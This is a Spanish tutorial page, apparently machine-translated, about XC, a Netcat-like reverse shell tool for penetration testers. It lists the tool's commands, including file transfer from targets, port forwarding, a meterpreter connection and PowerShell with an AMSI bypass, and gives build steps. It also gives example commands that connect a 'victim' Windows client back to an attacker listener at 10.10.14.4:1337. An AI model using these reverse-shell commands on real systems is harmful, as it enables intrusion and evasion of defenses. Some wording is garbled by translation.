Tutoriales

XC: Guía completa de Netcat

Una poderosa herramienta, que recuerda a Netcat, diseñada para sistemas Linux y Windows.

Con su gama de funciones como manipulación de archivos, reenvío de puertos y ejecución de complementos, XC ofrece una variedad de capacidades para evaluadores de penetración y piratas informáticos éticos.

Este artículo proporciona una descripción detallada y una guía de configuración para utilizar eficazmente las funciones de XC.

Netcat es similar al shell inverso para Linux y Windows.

característica

ventanas

Usage:
└ Shared Commands:  !exit
  !upload  
   * uploads a file to the target
  !download  
   * downloads a file from the target
  !lfwd   
   * local portforwarding (like ssh -L)
  !rfwd   
   * remote portforwarding (like ssh -R)
  !lsfwd
   * lists active forwards
  !rmfwd 
   * removes forward by index
  !plugins
   * lists available plugins
  !plugin 
   * execute a plugin
  !spawn 
   * spawns another client on the specified port
  !shell
   * runs /bin/sh
  !runas   
   * restart xc with the specified user
  !met 
   * connects to a x64/meterpreter/reverse_tcp listener
└ OS Specific Commands:
  !powershell
    * starts powershell with AMSI Bypass
  !rc 
    * connects to a local bind shell and restarts this client over it
  !runasps   
    * restart xc with the specified user using powershell
  !vulns
    * checks for common vulnerabilities

linux

Usage:
└ Shared Commands:  !exit
  !upload  
   * uploads a file to the target
  !download  
   * downloads a file from the target
  !lfwd   
   * local portforwarding (like ssh -L)
  !rfwd   
   * remote portforwarding (like ssh -R)
  !lsfwd
   * lists active forwards
  !rmfwd 
   * removes forward by index
  !plugins
   * lists available plugins
  !plugin 
   * execute a plugin
  !spawn 
   * spawns another client on the specified port
  !shell
   * runs /bin/sh
  !runas   
   * restart xc with the specified user
  !met 
   * connects to a x64/meterpreter/reverse_tcp listener
└ OS Specific Commands:
 !ssh 
   * starts sshd with the configured keys on the specified port

ejemplo

  • Atacante de Linux: rlwrap xc -l -p 1337 (servidor)
  • Víctimas de Windows: xc.exe 10.10.14.4 1337 (cliente)
  • Sin base para: xc_10.10.14.4_1337.exe (cliente)

configuración

Asegúrese de ejecutar la versión 1.15+ de golang; las versiones anteriores no se compilarán. Probé en ubuntu: go version go1.16.2 linux/amd64 y cali go version go1.15.9 linux/amd64

git clone --recurse-submodules 

GO111MODULE=off go get golang.org/x/sys/...
GO111MODULE=off go get golang.org/x/text/encoding/unicode
GO111MODULE=off go get github.com/hashicorp/yamux
GO111MODULE=off go get github.com/libp2p/go-reuseport
sudo apt-get install rlwrap upx

Linux:

python3 build.py

LEER  Los revendedores ya están tratando de ganar dinero rápido con Steam Deck

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba